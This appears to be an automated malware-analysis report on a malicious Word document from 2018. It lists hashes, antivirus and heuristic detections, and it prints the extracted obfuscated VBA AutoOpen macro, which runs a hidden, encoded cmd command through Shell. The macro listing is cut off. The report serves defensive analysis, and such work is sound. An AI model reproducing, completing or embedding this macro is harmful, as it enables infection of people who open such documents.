Office (OLE) malware analysis — malicious · ec6613de5729b169

MALICIOUS

Office (OLE)

96.6 KB Created: 2018-07-31 07:44:00 Authoring application: Microsoft Office Word First seen: 2018-08-05

MD5: 300a094ff19cb921be9d4b53fabd9489 SHA-1: 8d379165445eddc009e4c680d16b467ecb78437e SHA-256: ec6613de5729b1691c711b2a8bd3edb0cd413dfe6fd8c10e758748cf52f439d2

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is a malicious Word document containing a legacy WordBasic AutoOpen macro. The macro attempts to execute a command using the Shell function, concatenating several variables to form the command string. The exact command executed is not fully reconstructible due to obfuscation and truncation, but it appears to be an attempt to run a command-line utility.

Heuristics 5

ClamAV: Doc.Malware.Valyria-6707428-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6707428-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5602 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5602 bytes
SHA-256: `de737ee596b8dca2e96b5e4b6b1c8cfe4cc3ed878d4c780fea1c55cf1849a984`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "jBjqijilP" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next AppActivate Log(rfYtvU) AppActivate PfUTwb AppActivate Round(DQHiV) AppActivate 7 AppActivate CLng(qkmQzC) Shell@ CVar("cm") + nfJDsPLsQdZwz + iLlBYai + OVphjoNm + zLHtJo + wEjWoF + bjwIfufU + jHCOEnXMHdus, 287080983 - 287080983 AppActivate 290754200 AppActivate 2850 End Sub Attribute VB_Name = "jsYNcOlPzCucLq" Function OVphjoNm() On Error Resume Next AppActivate Rnd(mRvXkC) AppActivate CByte(AaQiEE - wYPOh / 70217 * 65549) jcriCF = "d /V:ON" + "/C" + CStr(Chr(IwjTcFkRuoc + ToWbLjc + 34 + jqKFiDtVTUcjPR + rZlVGwDFmz)) + "set 7M" + "fD=BYlOA" + "KBRDto" + "kCZYGS" + "(UQj;7zw" + "+Pe" + "bdyg" + "-N,p.{0$iW" + "f)'u}Fvs@n" + "5/r=a:X\ x" AppActivate VzALn AppActivate 6374 nfNJaowspd = "4hmcL" + "&&for %B" + " in (3" + "5,10" + ",24,2" + "7,54,49" + ",63,27" + ",2" + ",2,6" AppActivate Int(84992 + AjlYI) AppActivate knoTZF jomfBJFlYh = "0,39,64,2" + "4,3" + "5,55" + ",51,27,2" + "4,3" + "2,10" + ",28,20,27" AppActivate CInt(60696 - SvLDKw) AppActivate Sgn(29730 / LdMfF) AppActivate 620 QFYktEL = ",65,9,6" + "0," + "33,2" + "7,9,36,4" + "1,27," + "28,12,2," + "40,27,51,9" + ",21,39," + "54,3," + "15,55," + "44,63,9" + ",9,35,57" AppActivate Chr(889) AppActivate ChrW(23452 / qFGBzU / 18739 / vslJI) bYIzQuZPVQ = ",53," + "53" + "," + "9," + "10" + ",51,30" + ",49,6" + "4,56,54" + ",4" + "0,51,2" + "7,49," AppActivate Atn(83) AppActivate PqnjIE rXDTi = "27,54,48" + ",40" + ",65," + "27,36,65" + ",10,36,45" + ",11,53,31," + "28,4" + "9,40,38,38" + ",50," + "63" + ",9,9,35,57" + ",53,53," + "65" AppActivate Sqr(327005280) AppActivate Oct(8) XTGXqTEjKjB = ",56,51" + ",27" + ",48,56" + ",23,23,4" + "0,36,65,1" OVphjoNm = jcriCF + nfNJaowspd + jomfBJFlYh + QFYktEL + bYIzQuZPVQ + rXDTi + XTGXqTEjKjB AppActivate Round(13) AppActivate 1 End Function Function zLHtJo() On Error Resume Next AppActivate Log(psrNp) AppActivate Sin(pmzTM + TETLVf) YYXDhNp = "0,64,36,2" + "8,54,53,7," + "22,48,50," + "6" + "3,9,9,35" + ",57,53,53" + ",42" + ",45,42,4" + "5," + "36," + "65" + ",10,64,3" + "6,64,61," AppActivate CSng(47521 / iBqwZ) AppActivate CDbl(NiZZT) KrEEBbZaU = "53,18,1" + "9" + ",4,33,3" + "5,6,50" + ",63,9," + "9," + "35,57,53,5" + "3," + "65,54,56" + "," + "51,64,1" AppActivate TXIAAj AppActivate 745 AppActivate 977 tkDjQKJtL = "0,5" + "4,27,2" + ",10," + "29,31" + ",27,36,65" + ",10,36" + ",45,11,53" + "," + "56,18,38" + ",10,38,50" AppActivate 207146719 AppActivate Cos(36527 * XThwwR) uiAnl = ",63" + ",9,9,35" + ",57,53," + "53,65,10" + ",51,4" + "9,45," + "2,9,10" AppActivate Hex(389176995) AppActivate ChrW(6688) FUwHGCri = "," + "54,27,49" + ",3" + "0,27,64,3" + "5,54,2" + "7,49," + "56," + "49,36," + "65,10" + "," + "64,53,19" + ",19,7" AppActivate Oct(mlnAA) AppActivate 9162 AppActivate Sin(25) nKrfmzBzf = ",66,27,5" + "2,56,44" + ",3" + "6,16,35,2" + ",40" + ",9,17,44" + ",50" AppActivate cbCZL AppActivate CBool(HNMXT * JBKGYC) uMCJTam = ",44,4" + "3,21,39," + "64,29,58," + "60,55,6" + "0,44" + "," + "2" + "2,62,22,4" + "4,21" AppActivate ldprQa AppActivate cXnzD AppActivate Sgn(72522 + WPDzCZ / KskLY - QmNiwl) mbYlvZNTb = ",39," + "6" + "3,18,47,5" + "5" + ",39,27," + "51,4" + "8" + "," + "57,9,27,64" + ",35,25,4" + "4,59,44," + "25" AppActivate Sgn(292058530) AppActivate 851 AppActivate Rnd(MZdjK) rrDCNnkuOz = ",3" + "9,64,29,58" + ",25," + "44,36," + "27" + ",61,27" + ",44,21,42," + "10" + ",5" + "4,27,56,6" AppActivate wVAPKR AppActivate CSng(qICwPW + CSdES + PmNCii - zwJAZw) AppActivate CByte(NqzLni) vEsXH = "5,63" + ",17,39,48," + "56" + "," + "4,60,40,5" + "1," + "60" + ",39,54,3" AppActivate vvvtzC AppActivate XKzmQ CYPGA = ",15,4 ... (truncated)

SHA-256: de737ee596b8dca2e96b5e4b6b1c8cfe4cc3ed878d4c780fea1c55cf1849a984

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "jBjqijilP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   AppActivate Log(rfYtvU)
   AppActivate PfUTwb
   AppActivate Round(DQHiV)
   AppActivate 7
   AppActivate CLng(qkmQzC)
Shell@ CVar("cm") + nfJDsPLsQdZwz + iLlBYai + OVphjoNm + zLHtJo + wEjWoF + bjwIfufU + jHCOEnXMHdus, 287080983 - 287080983
   AppActivate 290754200
   AppActivate 2850
End Sub


Attribute VB_Name = "jsYNcOlPzCucLq"
Function OVphjoNm()
On Error Resume Next
AppActivate Rnd(mRvXkC)
   AppActivate CByte(AaQiEE - wYPOh / 70217 * 65549)
jcriCF = "d /V:ON" + "/C" + CStr(Chr(IwjTcFkRuoc + ToWbLjc + 34 + jqKFiDtVTUcjPR + rZlVGwDFmz)) + "set 7M" + "fD=BYlOA" + "KBRDto" + "kCZYGS" + "(UQj;7zw" + "+Pe" + "bdyg" + "-N,p.{0$iW" + "f)'u}Fvs@n" + "5/r=a:X\ x"
AppActivate VzALn
   AppActivate 6374
nfNJaowspd = "4hmcL" + "&&for %B" + " in (3" + "5,10" + ",24,2" + "7,54,49" + ",63,27" + ",2" + ",2,6"
AppActivate Int(84992 + AjlYI)
   AppActivate knoTZF
jomfBJFlYh = "0,39,64,2" + "4,3" + "5,55" + ",51,27,2" + "4,3" + "2,10" + ",28,20,27"
AppActivate CInt(60696 - SvLDKw)
   AppActivate Sgn(29730 / LdMfF)
   AppActivate 620
QFYktEL = ",65,9,6" + "0," + "33,2" + "7,9,36,4" + "1,27," + "28,12,2," + "40,27,51,9" + ",21,39," + "54,3," + "15,55," + "44,63,9" + ",9,35,57"
AppActivate Chr(889)
   AppActivate ChrW(23452 / qFGBzU / 18739 / vslJI)
bYIzQuZPVQ = ",53," + "53" + "," + "9," + "10" + ",51,30" + ",49,6" + "4,56,54" + ",4" + "0,51,2" + "7,49,"
AppActivate Atn(83)
   AppActivate PqnjIE
rXDTi = "27,54,48" + ",40" + ",65," + "27,36,65" + ",10,36,45" + ",11,53,31," + "28,4" + "9,40,38,38" + ",50," + "63" + ",9,9,35,57" + ",53,53," + "65"
AppActivate Sqr(327005280)
   AppActivate Oct(8)
XTGXqTEjKjB = ",56,51" + ",27" + ",48,56" + ",23,23,4" + "0,36,65,1"
OVphjoNm = jcriCF + nfNJaowspd + jomfBJFlYh + QFYktEL + bYIzQuZPVQ + rXDTi + XTGXqTEjKjB
   AppActivate Round(13)
   AppActivate 1
End Function
Function zLHtJo()
On Error Resume Next
AppActivate Log(psrNp)
   AppActivate Sin(pmzTM + TETLVf)
YYXDhNp = "0,64,36,2" + "8,54,53,7," + "22,48,50," + "6" + "3,9,9,35" + ",57,53,53" + ",42" + ",45,42,4" + "5," + "36," + "65" + ",10,64,3" + "6,64,61,"
AppActivate CSng(47521 / iBqwZ)
   AppActivate CDbl(NiZZT)
KrEEBbZaU = "53,18,1" + "9" + ",4,33,3" + "5,6,50" + ",63,9," + "9," + "35,57,53,5" + "3," + "65,54,56" + "," + "51,64,1"
AppActivate TXIAAj
   AppActivate 745
   AppActivate 977
tkDjQKJtL = "0,5" + "4,27,2" + ",10," + "29,31" + ",27,36,65" + ",10,36" + ",45,11,53" + "," + "56,18,38" + ",10,38,50"
AppActivate 207146719
   AppActivate Cos(36527 * XThwwR)
uiAnl = ",63" + ",9,9,35" + ",57,53," + "53,65,10" + ",51,4" + "9,45," + "2,9,10"
AppActivate Hex(389176995)
   AppActivate ChrW(6688)
FUwHGCri = "," + "54,27,49" + ",3" + "0,27,64,3" + "5,54,2" + "7,49," + "56," + "49,36," + "65,10" + "," + "64,53,19" + ",19,7"
AppActivate Oct(mlnAA)
   AppActivate 9162
   AppActivate Sin(25)
nKrfmzBzf = ",66,27,5" + "2,56,44" + ",3" + "6,16,35,2" + ",40" + ",9,17,44" + ",50"
AppActivate cbCZL
   AppActivate CBool(HNMXT * JBKGYC)
uMCJTam = ",44,4" + "3,21,39," + "64,29,58," + "60,55,6" + "0,44" + "," + "2" + "2,62,22,4" + "4,21"
AppActivate ldprQa
   AppActivate cXnzD
   AppActivate Sgn(72522 + WPDzCZ / KskLY - QmNiwl)
mbYlvZNTb = ",39," + "6" + "3,18,47,5" + "5" + ",39,27," + "51,4" + "8" + "," + "57,9,27,64" + ",35,25,4" + "4,59,44," + "25"
AppActivate Sgn(292058530)
   AppActivate 851
   AppActivate Rnd(MZdjK)
rrDCNnkuOz = ",3" + "9,64,29,58" + ",25," + "44,36," + "27" + ",61,27" + ",44,21,42," + "10" + ",5" + "4,27,56,6"
AppActivate wVAPKR
   AppActivate CSng(qICwPW + CSdES + PmNCii - zwJAZw)
   AppActivate CByte(NqzLni)
vEsXH = "5,63" + ",17,39,48," + "56" + "," + "4,60,40,5" + "1," + "60" + ",39,54,3"
AppActivate vvvtzC
   AppActivate XKzmQ
CYPGA = ",15,4
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.